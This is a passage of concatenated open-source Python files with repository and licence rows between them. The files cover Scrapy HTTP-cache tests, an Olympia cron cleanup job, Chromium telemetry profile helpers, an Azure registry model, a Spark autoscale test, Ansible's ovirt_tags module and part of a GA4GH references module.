
    def test_storage_never_expire(self):
        # HTTPCACHE_EXPIRATION_SECS=0 means entries never expire.
        with self._storage(HTTPCACHE_EXPIRATION_SECS=0) as storage:
            assert storage.retrieve_response(self.spider, self.request) is None
            storage.store_response(self.spider, self.request, self.response)
            time.sleep(0.5)  # give the chance to expire
            assert storage.retrieve_response(self.spider, self.request)
class DbmStorageTest(DefaultStorageTest):
    """Runs the DefaultStorageTest suite against the DBM-backed storage."""

    storage_class = 'scrapy.contrib.httpcache.DbmCacheStorage'
class DbmStorageWithCustomDbmModuleTest(DbmStorageTest):
    """DBM storage tests with HTTPCACHE_DBM_MODULE pointing at a mock module."""

    # Dotted path of the stand-in dbm implementation.
    dbm_module = 'tests.mocks.dummydbm'

    def _get_settings(self, **new_settings):
        new_settings.setdefault('HTTPCACHE_DBM_MODULE', self.dbm_module)
        return super(DbmStorageWithCustomDbmModuleTest, self)._get_settings(**new_settings)

    def test_custom_dbm_module_loaded(self):
        # make sure our dbm module has been loaded
        with self._storage() as storage:
            self.assertEqual(storage.dbmodule.__name__, self.dbm_module)
class FilesystemStorageTest(DefaultStorageTest):
    """Runs the DefaultStorageTest suite against the filesystem storage."""

    storage_class = 'scrapy.contrib.httpcache.FilesystemCacheStorage'
class FilesystemStorageGzipTest(FilesystemStorageTest):
    """Filesystem storage suite with on-disk gzip compression enabled."""

    def _get_settings(self, **new_settings):
        """Returns the test Settings with HTTPCACHE_GZIP switched on.

        Fix: super() must name the class it is called from
        (FilesystemStorageGzipTest), not its parent -- naming the parent
        starts the MRO lookup *after* FilesystemStorageTest and would
        silently skip any _get_settings override added there.
        """
        new_settings.setdefault('HTTPCACHE_GZIP', True)
        return super(FilesystemStorageGzipTest, self)._get_settings(**new_settings)
class LeveldbStorageTest(DefaultStorageTest):
    """Runs the DefaultStorageTest suite against the LevelDB storage."""

    # Evaluated at class-definition time: skips this class entirely when
    # the optional leveldb bindings are not installed.
    pytest.importorskip('leveldb')
    storage_class = 'scrapy.contrib.httpcache.LeveldbCacheStorage'
class DummyPolicyTest(_BaseTest):
    """Middleware behaviour under the cache-everything DummyPolicy."""

    policy_class = 'scrapy.contrib.httpcache.DummyPolicy'

    def test_middleware(self):
        # First pass misses, stores; second pass serves from cache.
        with self._middleware() as mw:
            assert mw.process_request(self.request, self.spider) is None
            mw.process_response(self.request, self.response, self.spider)
            response = mw.process_request(self.request, self.spider)
            assert isinstance(response, HtmlResponse)
            self.assertEqualResponse(self.response, response)
            assert 'cached' in response.flags

    def test_different_request_response_urls(self):
        # Cache is keyed on the request URL even if the response URL differs.
        with self._middleware() as mw:
            req = Request('http://host.com/path')
            res = Response('http://host2.net/test.html')

            assert mw.process_request(req, self.spider) is None
            mw.process_response(req, res, self.spider)

            cached = mw.process_request(req, self.spider)
            assert isinstance(cached, Response)
            self.assertEqualResponse(res, cached)
            assert 'cached' in cached.flags

    def test_middleware_ignore_missing(self):
        # HTTPCACHE_IGNORE_MISSING raises IgnoreRequest on a cache miss.
        with self._middleware(HTTPCACHE_IGNORE_MISSING=True) as mw:
            self.assertRaises(IgnoreRequest, mw.process_request, self.request, self.spider)
            mw.process_response(self.request, self.response, self.spider)
            response = mw.process_request(self.request, self.spider)
            assert isinstance(response, HtmlResponse)
            self.assertEqualResponse(self.response, response)
            assert 'cached' in response.flags

    def test_middleware_ignore_schemes(self):
        # http responses are cached by default
        req, res = Request('http://test.com/'), Response('http://test.com/')
        with self._middleware() as mw:
            assert mw.process_request(req, self.spider) is None
            mw.process_response(req, res, self.spider)

            cached = mw.process_request(req, self.spider)
            assert isinstance(cached, Response), type(cached)
            self.assertEqualResponse(res, cached)
            assert 'cached' in cached.flags

        # file response is not cached by default
        req, res = Request('file:///tmp/t.txt'), Response('file:///tmp/t.txt')
        with self._middleware() as mw:
            assert mw.process_request(req, self.spider) is None
            mw.process_response(req, res, self.spider)

            assert mw.storage.retrieve_response(self.spider, req) is None
            assert mw.process_request(req, self.spider) is None

        # s3 scheme response is cached by default
        req, res = Request('s3://bucket/key'), Response('http://bucket/key')
        with self._middleware() as mw:
            assert mw.process_request(req, self.spider) is None
            mw.process_response(req, res, self.spider)

            cached = mw.process_request(req, self.spider)
            assert isinstance(cached, Response), type(cached)
            self.assertEqualResponse(res, cached)
            assert 'cached' in cached.flags

        # ignore s3 scheme
        req, res = Request('s3://bucket/key2'), Response('http://bucket/key2')
        with self._middleware(HTTPCACHE_IGNORE_SCHEMES=['s3']) as mw:
            assert mw.process_request(req, self.spider) is None
            mw.process_response(req, res, self.spider)

            assert mw.storage.retrieve_response(self.spider, req) is None
            assert mw.process_request(req, self.spider) is None

    def test_middleware_ignore_http_codes(self):
        # test response is not cached (fixture response status is 202)
        with self._middleware(HTTPCACHE_IGNORE_HTTP_CODES=[202]) as mw:
            assert mw.process_request(self.request, self.spider) is None
            mw.process_response(self.request, self.response, self.spider)

            assert mw.storage.retrieve_response(self.spider, self.request) is None
            assert mw.process_request(self.request, self.spider) is None

        # test response is cached
        with self._middleware(HTTPCACHE_IGNORE_HTTP_CODES=[203]) as mw:
            mw.process_response(self.request, self.response, self.spider)
            response = mw.process_request(self.request, self.spider)
            assert isinstance(response, HtmlResponse)
            self.assertEqualResponse(self.response, response)
            assert 'cached' in response.flags
class RFC2616PolicyTest(DefaultStorageTest):
    """Middleware behaviour under the RFC 2616 HTTP caching policy."""

    policy_class = 'scrapy.contrib.httpcache.RFC2616Policy'

    def _process_requestresponse(self, mw, request, response):
        """Runs a request (and its downloaded response) through the middleware.

        Returns either the cached response (when process_request produced
        one) or the result of process_response.  On any error the
        request/response/result triple is printed before re-raising.

        Fix: `result` is pre-initialized so the debug print in the except
        block cannot raise UnboundLocalError (masking the real exception)
        when mw.process_request itself fails.
        """
        result = None
        try:
            result = mw.process_request(request, self.spider)
            if result:
                assert isinstance(result, (Request, Response))
                return result
            else:
                result = mw.process_response(request, response, self.spider)
                assert isinstance(result, Response)
                return result
        except Exception:
            print('Request', request)
            print('Response', response)
            print('Result', result)
            raise

    def test_request_cacheability(self):
        res0 = Response(self.request.url, status=200,
                        headers={'Expires': self.tomorrow})
        req0 = Request('http://example.com')
        req1 = req0.replace(headers={'Cache-Control': 'no-store'})
        req2 = req0.replace(headers={'Cache-Control': 'no-cache'})
        with self._middleware() as mw:
            # response for a request with no-store must not be cached
            res1 = self._process_requestresponse(mw, req1, res0)
            self.assertEqualResponse(res1, res0)
            assert mw.storage.retrieve_response(self.spider, req1) is None
            # Re-do request without no-store and expect it to be cached
            res2 = self._process_requestresponse(mw, req0, res0)
            assert 'cached' not in res2.flags
            res3 = mw.process_request(req0, self.spider)
            assert 'cached' in res3.flags
            self.assertEqualResponse(res2, res3)
            # request with no-cache directive must not return cached response
            # but it allows new response to be stored
            res0b = res0.replace(body='foo')
            res4 = self._process_requestresponse(mw, req2, res0b)
            self.assertEqualResponse(res4, res0b)
            assert 'cached' not in res4.flags
            res5 = self._process_requestresponse(mw, req0, None)
            self.assertEqualResponse(res5, res0b)
            assert 'cached' in res5.flags

    def test_response_cacheability(self):
        # (should-be-cached?, status, headers) triples.
        responses = [
            # 304 is not cacheable no matter what servers sends
            (False, 304, {}),
            (False, 304, {'Last-Modified': self.yesterday}),
            (False, 304, {'Expires': self.tomorrow}),
            (False, 304, {'Etag': 'bar'}),
            (False, 304, {'Cache-Control': 'max-age=3600'}),
            # Always obey no-store cache control
            (False, 200, {'Cache-Control': 'no-store'}),
            (False, 200, {'Cache-Control': 'no-store, max-age=300'}),  # invalid
            (False, 200, {'Cache-Control': 'no-store', 'Expires': self.tomorrow}),  # invalid
            # Ignore responses missing expiration and/or validation headers
            (False, 200, {}),
            (False, 302, {}),
            (False, 307, {}),
            (False, 404, {}),
            # Cache responses with expiration and/or validation headers
            (True, 200, {'Last-Modified': self.yesterday}),
            (True, 203, {'Last-Modified': self.yesterday}),
            (True, 300, {'Last-Modified': self.yesterday}),
            (True, 301, {'Last-Modified': self.yesterday}),
            (True, 401, {'Last-Modified': self.yesterday}),
            (True, 404, {'Cache-Control': 'public, max-age=600'}),
            (True, 302, {'Expires': self.tomorrow}),
            (True, 200, {'Etag': 'foo'}),
        ]
        with self._middleware() as mw:
            for idx, (shouldcache, status, headers) in enumerate(responses):
                req0 = Request('http://example-%d.com' % idx)
                res0 = Response(req0.url, status=status, headers=headers)
                res1 = self._process_requestresponse(mw, req0, res0)
                res304 = res0.replace(status=304)
                res2 = self._process_requestresponse(mw, req0, res304 if shouldcache else res0)
                self.assertEqualResponse(res1, res0)
                self.assertEqualResponse(res2, res0)
                resc = mw.storage.retrieve_response(self.spider, req0)
                if shouldcache:
                    self.assertEqualResponse(resc, res1)
                    assert 'cached' in res2.flags and res2.status != 304
                else:
                    self.assertFalse(resc)
                    assert 'cached' not in res2.flags

    def test_cached_and_fresh(self):
        # Responses that must be served from cache without revalidation.
        sampledata = [
            (200, {'Date': self.yesterday, 'Expires': self.tomorrow}),
            (200, {'Date': self.yesterday, 'Cache-Control': 'max-age=86405'}),
            (200, {'Age': '299', 'Cache-Control': 'max-age=300'}),
            # Obey max-age if present over any others
            (200, {'Date': self.today,
                   'Age': '86405',
                   'Cache-Control': 'max-age=' + str(86400 * 3),
                   'Expires': self.yesterday,
                   'Last-Modified': self.yesterday,
                   }),
            # obey Expires if max-age is not present
            (200, {'Date': self.yesterday,
                   'Age': '86400',
                   'Cache-Control': 'public',
                   'Expires': self.tomorrow,
                   'Last-Modified': self.yesterday,
                   }),
            # Default missing Date header to right now
            (200, {'Expires': self.tomorrow}),
            # Firefox - Expires if age is greater than 10% of (Date - Last-Modified)
            (200, {'Date': self.today, 'Last-Modified': self.yesterday, 'Age': str(86400 / 10 - 1)}),
            # Firefox - Set one year maxage to permanent redirects missing expiration info
            (300, {}), (301, {}), (308, {}),
        ]
        with self._middleware() as mw:
            for idx, (status, headers) in enumerate(sampledata):
                req0 = Request('http://example-%d.com' % idx)
                res0 = Response(req0.url, status=status, headers=headers)
                # cache fresh response
                res1 = self._process_requestresponse(mw, req0, res0)
                self.assertEqualResponse(res1, res0)
                assert 'cached' not in res1.flags
                # return fresh cached response without network interaction
                res2 = self._process_requestresponse(mw, req0, None)
                self.assertEqualResponse(res1, res2)
                assert 'cached' in res2.flags

    def test_cached_and_stale(self):
        # Responses that are cached but must be refetched/revalidated.
        sampledata = [
            (200, {'Date': self.today, 'Expires': self.yesterday}),
            (200, {'Date': self.today, 'Expires': self.yesterday, 'Last-Modified': self.yesterday}),
            (200, {'Expires': self.yesterday}),
            (200, {'Expires': self.yesterday, 'ETag': 'foo'}),
            (200, {'Expires': self.yesterday, 'Last-Modified': self.yesterday}),
            (200, {'Expires': self.tomorrow, 'Age': '86405'}),
            (200, {'Cache-Control': 'max-age=86400', 'Age': '86405'}),
            # no-cache forces expiration, also revalidation if validators exists
            (200, {'Cache-Control': 'no-cache'}),
            (200, {'Cache-Control': 'no-cache', 'ETag': 'foo'}),
            (200, {'Cache-Control': 'no-cache', 'Last-Modified': self.yesterday}),
        ]
        with self._middleware() as mw:
            for idx, (status, headers) in enumerate(sampledata):
                req0 = Request('http://example-%d.com' % idx)
                res0a = Response(req0.url, status=status, headers=headers)
                # cache expired response
                res1 = self._process_requestresponse(mw, req0, res0a)
                self.assertEqualResponse(res1, res0a)
                assert 'cached' not in res1.flags
                # Same request but as cached response is stale a new response must
                # be returned
                res0b = res0a.replace(body='bar')
                res2 = self._process_requestresponse(mw, req0, res0b)
                self.assertEqualResponse(res2, res0b)
                assert 'cached' not in res2.flags
                # Previous response expired too, subsequent request to same
                # resource must revalidate and succeed on 304 if validators
                # are present
                if 'ETag' in headers or 'Last-Modified' in headers:
                    res0c = res0b.replace(status=304)
                    res3 = self._process_requestresponse(mw, req0, res0c)
                    self.assertEqualResponse(res3, res0b)
                    assert 'cached' in res3.flags
# Allows running this test module directly.
if __name__ == '__main__':
    unittest.main()
| bsd-3-clause |
magopian/olympia | apps/files/cron.py | 15 | 1534 | import hashlib
import os
import shutil
import stat
import time
from django.conf import settings
from django.core.cache import cache
import commonware.log
import cronjobs
from files.models import FileValidation
log = commonware.log.getLogger('z.cron')
@cronjobs.register
def cleanup_extracted_file():
    """Removes file-viewer extraction directories older than one hour.

    For every removed numeric file id, also deletes the memoized
    file/diff cache entries keyed on that id so the viewer does not
    serve stale data.
    """
    log.info('Removing extracted files for file viewer.')
    root = os.path.join(settings.TMP_PATH, 'file_viewer')
    # Extractions untouched for longer than this are considered stale.
    max_age_secs = 60 * 60
    for path in os.listdir(root):
        full = os.path.join(root, path)
        age = time.time() - os.stat(full).st_atime
        if age > max_age_secs:
            log.debug('Removing extracted files: %s, %dsecs old.' %
                      (full, age))
            shutil.rmtree(full)
            # Nuke out the file and diff caches when the file gets removed.
            # (renamed from `id` to avoid shadowing the builtin)
            file_id = os.path.basename(path)
            try:
                int(file_id)
            except ValueError:
                # Not a numeric file id; nothing memoized under this name.
                continue

            key = hashlib.md5()
            key.update(str(file_id))
            cache.delete('%s:memoize:%s:%s' % (settings.CACHE_PREFIX,
                                               'file-viewer', key.hexdigest()))
@cronjobs.register
def cleanup_validation_results():
    """Will remove all validation results. Used when the validator is
    upgraded and results may no longer be relevant."""
    # With a large enough number of objects, not using no_cache() can
    # produce tracebacks.
    # (renamed from `all` to avoid shadowing the builtin)
    results = FileValidation.objects.no_cache().all()
    log.info('Removing %s old validation results.' % (results.count()))
    results.delete()
| bsd-3-clause |
imply/chuu | tools/telemetry/telemetry/core/profile_types.py | 23 | 2733 | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from telemetry.core import discover
from telemetry.core import profile_creator
# Profile types that need no pre-built or discovered profile directory.
BASE_PROFILE_TYPES = ['clean', 'default']

# 'profile name' -> ProfileCreator class; populated by FindProfileCreators().
PROFILE_CREATORS = {}

# 'profile name' -> checkout-relative path of a canned profile directory.
PROFILE_TYPE_MAPPING = {
  'typical_user': 'chrome/test/data/extensions/profiles/content_scripts1',
  'power_user': 'chrome/test/data/extensions/profiles/extension_webrequest',
}
def _DiscoverCreateableProfiles(profile_creators_dir, base_dir):
  """Returns a dictionary of all the profile creators we can use to create
  a Chrome profile for testing located in |profile_creators_dir|.

  The returned value consists of 'class_name' -> 'test class' dictionary where
  class_name is the name of the class with the _creator suffix removed e.g.
  'small_profile_creator will be 'small_profile'.
  """
  discovered = discover.DiscoverClasses(
      profile_creators_dir, base_dir, profile_creator.ProfileCreator)

  # Re-key the result with the '_creator' suffix stripped from each name.
  suffix = '_creator'
  renamed = {}
  for class_name, creator_class in discovered.iteritems():
    assert class_name.endswith(suffix)
    renamed[class_name[:-len(suffix)]] = creator_class
  return renamed
def ClearProfieCreatorsForTests():
  """Clears the discovered profile creator objects. Used for unit tests."""
  # NOTE(review): the name misspells 'Profile', but it is public API;
  # keep it for backwards compatibility with existing callers.
  PROFILE_CREATORS.clear()
def FindProfileCreators(profile_creators_dir, base_dir):
  """Discover all the ProfileCreator objects in |profile_creators_dir|.

  Populates the module-level PROFILE_CREATORS registry; may only be
  called once per process (or after ClearProfieCreatorsForTests()).
  """
  assert not PROFILE_CREATORS  # It's illegal to call this function twice.
  PROFILE_CREATORS.update(_DiscoverCreateableProfiles(
      profile_creators_dir, base_dir))
def GetProfileTypes():
  """Returns a list of all command line options that can be specified for
  profile type."""
  # Base types first, then canned profile dirs, then discovered creators.
  all_types = list(BASE_PROFILE_TYPES)
  all_types.extend(PROFILE_TYPE_MAPPING.keys())
  all_types.extend(PROFILE_CREATORS.keys())
  return all_types
def GetProfileDir(profile_type):
  """Given a |profile_type| (as returned by GetProfileTypes()), return the
  directory to use for that profile, or None if the profile needs to be
  generated or does not need a profile directory (e.g. when using the
  browser's default profile)."""
  is_generated_or_default = (profile_type in BASE_PROFILE_TYPES or
                             profile_type in PROFILE_CREATORS)
  if is_generated_or_default:
    return None

  # Checked-in profiles live in the Chromium source tree, four levels above
  # this file; PROFILE_TYPE_MAPPING stores the source-relative path.
  relative_parts = PROFILE_TYPE_MAPPING[profile_type].split('/')
  here = os.path.dirname(__file__)
  path = os.path.abspath(
      os.path.join(here, '..', '..', '..', '..', *relative_parts))
  assert os.path.exists(path)
  return path
def GetProfileCreator(profile_type):
  """Returns the profile creator object corresponding to the |profile_type|
  string, or None if |profile_type| does not name a discovered creator."""
  return PROFILE_CREATORS.get(profile_type)
| bsd-3-clause |
lmazuel/azure-sdk-for-python | azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2017_10_01/models/registry_list_credentials_result.py | 2 | 1159 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class RegistryListCredentialsResult(Model):
    """The response from the ListCredentials operation.

    :param username: The username for a container registry.
    :type username: str
    :param passwords: The list of passwords for a container registry.
    :type passwords:
     list[~azure.mgmt.containerregistry.v2017_10_01.models.RegistryPassword]
    """

    _attribute_map = {
        'username': {'key': 'username', 'type': 'str'},
        'passwords': {'key': 'passwords', 'type': '[RegistryPassword]'},
    }

    def __init__(self, username=None, passwords=None):
        # BUGFIX: initialize the msrest Model base class so base-class
        # machinery (e.g. additional-properties handling, validation) is
        # set up correctly; the original skipped this call.
        super(RegistryListCredentialsResult, self).__init__()
        self.username = username
        self.passwords = passwords
| mit |
maropu/spark | resource-managers/kubernetes/integration-tests/tests/autoscale.py | 23 | 1592 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import time
from pyspark.sql import SparkSession
if __name__ == "__main__":
    """
    Usage: autoscale
    """
    # Smoke test for dynamic allocation on Kubernetes: build shuffle data,
    # wait long enough for the allocation manager to resize the executor
    # set, then verify the shuffled RDD is still usable afterwards.
    print("Starting autoscale test")
    spark = SparkSession \
        .builder \
        .appName("AutoScale") \
        .getOrCreate()
    sc = spark._sc
    initialRdd = sc.parallelize(range(100), 5)
    # Trigger a shuffle so there are shuffle blocks to migrate
    rdd = initialRdd.map(lambda x: (x, x)).groupByKey()
    rdd.collect()
    # NOTE(review): getExecutorMemoryStatus() is keyed per executor, so this
    # counts executors (including the driver), not cores -- the variable
    # name is misleading; confirm before relying on it.
    numCores = sc._jsc.sc().getExecutorMemoryStatus().size()
    print("Have " + str(numCores))
    print("Waiting for dynamic alloc")
    # Give dynamic allocation time to remove idle executors and migrate
    # their shuffle blocks.
    time.sleep(150)
    print("Finished waiting!")
    # The shuffle output must still be readable after executors changed.
    rdd.count()
    rdd.collect()
    print("Finished waiting, stopping Spark.")
    spark.stop()
    print("Done, exiting Python")
    sys.exit(0)
| apache-2.0 |
adityacs/ansible | lib/ansible/modules/cloud/ovirt/ovirt_tags.py | 7 | 6533 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
# Module documentation consumed by Ansible's doc tooling.  Fixes the
# duplicated-word typos ("the the") and documents the 'hosts' option, which
# the module accepts (see argument_spec / update_check) but never documented.
DOCUMENTATION = '''
---
module: ovirt_tags
short_description: Module to manage tags in oVirt
version_added: "2.3"
author: "Ondra Machacek (@machacekondra)"
description:
    - "This module manage tags in oVirt. It can also manage assignments
       of those tags to entities."
options:
    name:
        description:
            - "Name of the tag to manage."
        required: true
    state:
        description:
            - "Should the tag be present or absent."
        choices: ['present', 'absent']
        default: present
    description:
        description:
            - "Description of the tag to manage."
    parent:
        description:
            - "Name of the parent tag."
    vms:
        description:
            - "List of the VMs names, which should have assigned this tag."
    hosts:
        description:
            - "List of the hosts names, which should have assigned this tag."
extends_documentation_fragment: ovirt
'''
EXAMPLES = '''
# Examples don't contain auth parameter for simplicity,
# look at ovirt_auth module to see how to reuse authentication:
# Create(if not exists) and assign tag to vms vm1 and vm2:
- ovirt_tags:
name: mytag
vms:
- vm1
- vm2
# To detach all VMs from tag:
- ovirt_tags:
name: mytag
vms: []
# Remove tag
- ovirt_tags:
state: absent
name: mytag
'''
RETURN = '''
id:
description: ID of the tag which is managed
returned: On success if tag is found.
type: str
sample: 7de90f31-222c-436c-a1ca-7e655bd5b60c
tag:
description: "Dictionary of all the tag attributes. Tag attributes can be found on your oVirt instance
at following url: https://ovirt.example.com/ovirt-engine/api/model#types/tag."
returned: On success if tag is found.
'''
import traceback
try:
import ovirtsdk4.types as otypes
except ImportError:
pass
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ovirt import (
BaseModule,
check_sdk,
create_connection,
equal,
ovirt_full_argument_spec,
search_by_name,
)
class TagsModule(BaseModule):
    """
    BaseModule implementation that creates/updates oVirt tags and keeps the
    tag's VM and host assignments in sync with the module parameters.
    """

    def build_entity(self):
        """Build the otypes.Tag entity described by the module parameters."""
        return otypes.Tag(
            name=self._module.params['name'],
            description=self._module.params['description'],
            parent=otypes.Tag(
                name=self._module.params['parent'],
            ) if self._module.params['parent'] else None,
        )

    def post_create(self, entity):
        # Newly created tags still need their VM/host assignments applied.
        self.update_check(entity)

    def _update_tag_assignments(self, entity, name):
        """
        Sync the tag assignment for the entity collection |name| ('vms' or
        'hosts'): assign the tag to every listed entity and unassign it from
        every currently tagged entity that is not listed.  A parameter value
        of None means "leave assignments alone"; an empty list detaches all.
        """
        if self._module.params[name] is None:
            return
        entities_service = getattr(self._connection.system_service(), '%s_service' % name)()
        currently_tagged = [
            e.name
            for e in entities_service.list(search='tag=%s' % self._module.params['name'])
        ]
        # Assign the tag to entities that should have it:
        for entity_name in self._module.params[name]:
            # NOTE(review): search_by_name returns None when no entity with
            # this name exists, which would crash on .id below -- confirm
            # whether a friendlier error is wanted here.
            entity = search_by_name(entities_service, entity_name)
            tags_service = entities_service.service(entity.id).tags_service()
            current_tags = [tag.name for tag in tags_service.list()]
            # Assign the tag:
            if self._module.params['name'] not in current_tags:
                if not self._module.check_mode:
                    tags_service.add(
                        tag=otypes.Tag(
                            name=self._module.params['name'],
                        ),
                    )
                self.changed = True
        # Unassign the tag from entities that should no longer carry it:
        for entity_name in [e for e in currently_tagged if e not in self._module.params[name]]:
            # BUGFIX: report the pending change in check mode as well.  The
            # 'changed' flag was previously set only when the removal was
            # actually performed, so check mode under-reported detachments
            # (the assign branch above already reports them correctly).
            self.changed = True
            if not self._module.check_mode:
                entity = search_by_name(entities_service, entity_name)
                tags_service = entities_service.service(entity.id).tags_service()
                tag_id = [tag.id for tag in tags_service.list() if tag.name == self._module.params['name']][0]
                tags_service.tag_service(tag_id).remove()

    def _get_parent(self, entity):
        """Return the name of the entity's parent tag, or None if it has none."""
        parent = None
        if entity.parent:
            parent = self._connection.follow_link(entity.parent).name
        return parent

    def update_check(self, entity):
        """Apply assignment updates and report whether description and parent
        already match the requested values (True means no update needed)."""
        self._update_tag_assignments(entity, 'vms')
        self._update_tag_assignments(entity, 'hosts')
        return (
            equal(self._module.params.get('description'), entity.description) and
            equal(self._module.params.get('parent'), self._get_parent(entity))
        )
def main():
    """Entry point of the ovirt_tags Ansible module."""
    argument_spec = ovirt_full_argument_spec(
        state=dict(
            choices=['present', 'absent'],
            default='present',
        ),
        name=dict(default=None, required=True),
        description=dict(default=None),
        parent=dict(default=None),
        vms=dict(default=None, type='list'),
        hosts=dict(default=None, type='list'),
    )
    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=True,
    )
    check_sdk(module)

    # BUGFIX: if popping 'auth' or create_connection() raised, the finally
    # block used to reference names that were never bound, masking the real
    # error with a NameError.  Pre-bind them and guard the close() call.
    auth = None
    connection = None
    try:
        auth = module.params.pop('auth')
        connection = create_connection(auth)
        tags_service = connection.system_service().tags_service()
        tags_module = TagsModule(
            connection=connection,
            module=module,
            service=tags_service,
        )

        state = module.params['state']
        if state == 'present':
            ret = tags_module.create()
        elif state == 'absent':
            ret = tags_module.remove()

        module.exit_json(**ret)
    except Exception as e:
        module.fail_json(msg=str(e), exception=traceback.format_exc())
    finally:
        if connection is not None:
            # Log out only when we created the session ourselves (no token
            # was supplied by the caller).
            connection.close(logout=auth.get('token') is None)


if __name__ == "__main__":
    main()
| gpl-3.0 |
diekhans/ga4gh-server | ga4gh/datamodel/references.py | 2 | 15873 | """
Module responsible for translating reference sequence data into GA4GH native
objects.
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import hashlib
import json
import os
import random
import pysam
import ga4gh.datamodel as datamodel
import ga4gh.protocol as protocol
import ga4gh.exceptions as exceptions
DEFAULT_REFERENCESET_NAME = "Default"
"""
This is the name used for any reference set referred to in a BAM
file that does not provide the 'AS' tag in the @SQ header.
"""
class AbstractReferenceSet(datamodel.DatamodelObject):
    """
    A set of References, typically making up a reference assembly such as
    GRCh38.  Provides lookup of member References by id, name and index,
    plus accessors for assembly-level metadata.
    """
    compoundIdClass = datamodel.ReferenceSetCompoundId

    def __init__(self, localId):
        super(AbstractReferenceSet, self).__init__(None, localId)
        # Reference bookkeeping: lookup by id, lookup by local name, and an
        # id list preserving insertion order.
        self._referenceIdMap = {}
        self._referenceNameMap = {}
        self._referenceIds = []
        # Assembly-level metadata, populated by subclasses.
        self._assemblyId = None
        self._description = None
        self._isDerived = False
        self._ncbiTaxonId = None
        self._sourceAccessions = []
        self._sourceUri = None

    def addReference(self, reference):
        """
        Registers the given Reference with this ReferenceSet, indexing it
        both by id and by local name.
        """
        referenceId = reference.getId()
        self._referenceIdMap[referenceId] = reference
        self._referenceNameMap[reference.getLocalId()] = reference
        self._referenceIds.append(referenceId)

    def getReferences(self):
        """
        Returns this set's References in the order they were added.
        """
        return [self._referenceIdMap[referenceId]
                for referenceId in self._referenceIds]

    def getNumReferences(self):
        """
        Returns how many References this ReferenceSet contains.
        """
        return len(self._referenceIds)

    def getReferenceByIndex(self, index):
        """
        Returns the Reference at the given position (insertion order).
        """
        referenceId = self._referenceIds[index]
        return self._referenceIdMap[referenceId]

    def getReferenceByName(self, name):
        """
        Returns the Reference with the specified local name, raising
        ReferenceNameNotFoundException if there is none.
        """
        try:
            return self._referenceNameMap[name]
        except KeyError:
            raise exceptions.ReferenceNameNotFoundException(name)

    def getReference(self, id_):
        """
        Returns the Reference with the specified ID, raising
        ReferenceNotFoundException if there is none.
        """
        try:
            return self._referenceIdMap[id_]
        except KeyError:
            raise exceptions.ReferenceNotFoundException(id_)

    def getMd5Checksum(self):
        """
        Returns the MD5 checksum for this reference set: the per-Reference
        md5checksums are sorted, concatenated and hashed with MD5.
        """
        sortedChecksums = sorted(
            reference.getMd5Checksum()
            for reference in self.getReferences())
        return hashlib.md5(''.join(sortedChecksums)).hexdigest()

    def getAssemblyId(self):
        """
        Returns this reference set's public assembly id, e.g. `GRCh37`.
        """
        return self._assemblyId

    def getDescription(self):
        """
        Returns this reference set's free-text description.
        """
        return self._description

    def getIsDerived(self):
        """
        Returns True if this ReferenceSet is derived from a source set,
        i.e. it adds sequences or contains derived sequences.
        """
        return self._isDerived

    def getSourceAccessions(self):
        """
        Returns the known INSDC (GenBank/ENA/DDBJ) accession strings,
        ideally versioned, e.g. `NC_000001.11`.
        """
        return self._sourceAccessions

    def getSourceUri(self):
        """
        Returns the URI this ReferenceSet was obtained from.
        """
        return self._sourceUri

    def getNcbiTaxonId(self):
        """
        Returns the NCBI Taxon ID (http://www.ncbi.nlm.nih.gov/taxonomy,
        e.g. 9606 for human) of the species this assembly models.
        Individual References may carry a different taxon id, since
        assemblies can include sequences from other species (e.g. EBV in a
        human reference genome).
        """
        return self._ncbiTaxonId

    def toProtocolElement(self):
        """
        Returns the GA4GH protocol representation of this ReferenceSet.
        """
        protocolElement = protocol.ReferenceSet()
        protocolElement.id = self.getId()
        protocolElement.name = self.getLocalId()
        protocolElement.assemblyId = self.getAssemblyId()
        protocolElement.description = self.getDescription()
        protocolElement.isDerived = self.getIsDerived()
        protocolElement.md5checksum = self.getMd5Checksum()
        protocolElement.ncbiTaxonId = self.getNcbiTaxonId()
        protocolElement.referenceIds = self._referenceIds
        protocolElement.sourceAccessions = self.getSourceAccessions()
        protocolElement.sourceURI = self.getSourceUri()
        return protocolElement
class AbstractReference(datamodel.DatamodelObject):
    """
    Class representing References. A Reference is a canonical
    assembled contig, intended to act as a reference coordinate space
    for other genomic annotations. A single Reference might represent
    the human chromosome 1, for instance.
    """
    compoundIdClass = datamodel.ReferenceCompoundId

    def __init__(self, parentContainer, localId):
        super(AbstractReference, self).__init__(parentContainer, localId)
        self._length = -1
        self._md5checksum = ""
        self._sourceUri = None
        self._sourceAccessions = []
        self._isDerived = False
        self._sourceDivergence = None
        self._ncbiTaxonId = None

    def getLength(self):
        """
